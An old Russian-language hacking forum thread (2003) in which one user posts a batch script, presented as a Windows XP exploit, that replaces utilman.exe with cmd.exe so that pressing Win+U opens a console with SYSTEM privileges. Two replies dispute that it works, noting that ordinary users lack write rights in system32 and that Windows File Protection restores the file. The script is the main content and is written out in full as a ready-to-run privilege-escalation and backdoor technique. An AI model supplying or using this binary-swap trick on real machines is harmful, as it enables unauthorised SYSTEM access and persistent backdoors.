Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
|
Посмотри разрешения на system32 и расслабься 12.02.03 16:00 Число просмотров: 1628
Автор: ZloyShaman <ZloyShaman> Статус: Elderman
|
|
|
|
<hacking>
|
Очередной эксплоит WinXP 12.02.03 15:35
Автор: Sashman Статус: Незарегистрированный пользователь
|
Играясь в Винде ЭксПи с utility manager (\system32\utilman.exe; это такая прога, вызываемая WinKey+U, предназаначеная для всякого рода инвалидов, меня в ней интересовали mousekeys - контроль курсора мышки с клавы), я обнаружил следующую вещь:
при нажатии Win+U запускается 2 utilman'a: один с правами текущего пользователя, второй - угадайте - правильно, с правами SYSTEM.
Отсюда вытекает эксплоит с классической подменой exe-шника:
rem --- XPloit.utilman.bat -------------------------------------------
@echo off
echo WinXP Utility manager exploit. Copyleft (c) Sashman, 2003.
echo Make sure utilman.exe is not runing.
%systemdrive%
cd %windir%\system32\
echo Renaming utilman.exe to utilman.exp...
ren utilman.exe utilman.exp
echo Copying cmd.exe to utilman.exe...
copy cmd.exe utilman.exe
echo Press WinKey-U to obtain a console with SYSTEM privileges.
echo After you're finished, press a key to restore utilman.
pause>>nul
del utilman.exe
echo Renaming utilman.exp to utilman.exe...
ren utilman.exp utilman.exe
echo Good bye.
rem ------------- cut here ------------------------------------------
Правда, есть один нюанс: консоль с системными правами НЕ появляется у юзера с админскими правами, хотя и присутсвует в списке процессов.
(У обычных пользователей она, родимая, появляется, со всеми вытекающими последствиями :) ).
|
|
Очередной эксплоит WinXP 12.02.03 21:17
Автор: lem0n Статус: Незарегистрированный пользователь
|
Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.
> Играясь в Винде ЭксПи с utility manager
> (\system32\utilman.exe; это такая прога, вызываемая
> WinKey+U, предназаначеная для всякого рода инвалидов, меня
> в ней интересовали mousekeys - контроль курсора мышки с
> клавы), я обнаружил следующую вещь:
> при нажатии Win+U запускается 2 utilman'a: один с правами
> текущего пользователя, второй - угадайте - правильно, с
> правами SYSTEM.
> Отсюда вытекает эксплоит с классической подменой exe-шника:
>
>
> Правда, есть один нюанс: консоль с системными правами НЕ
> появляется у юзера с админскими правами, хотя и присутсвует
> в списке процессов.
> (У обычных пользователей она, родимая, появляется, со всеми
> вытекающими последствиями :) ).
|
|
Посмотри разрешения на system32 и расслабься 12.02.03 16:00
Автор: ZloyShaman <ZloyShaman> Статус: Elderman
|
|
|
|
|
подробно о проекте
Анализ криптографических сетевых...
